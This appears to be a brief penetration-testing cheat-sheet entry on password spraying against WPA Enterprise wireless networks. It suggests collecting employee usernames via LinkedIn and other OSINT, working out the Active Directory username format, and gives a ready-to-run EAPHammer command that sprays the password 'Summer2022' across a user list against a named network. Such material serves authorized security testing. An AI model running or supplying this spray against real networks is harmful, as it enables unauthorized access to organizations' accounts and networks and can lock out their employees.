Password spray

Password spray against WPA Enterprise

Try to get a username list of the corporate employees using LinkedIn or any other OSINT technique. Try to figure out the username format in use in their AD environment. The Eaphammer tool can be used to perform a password spray attack against a WPA Enterprise wireless network.

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 \
--essid "MonPrecieux" \
--password "Summer2022" \
--user-list userlist.txt

Last updated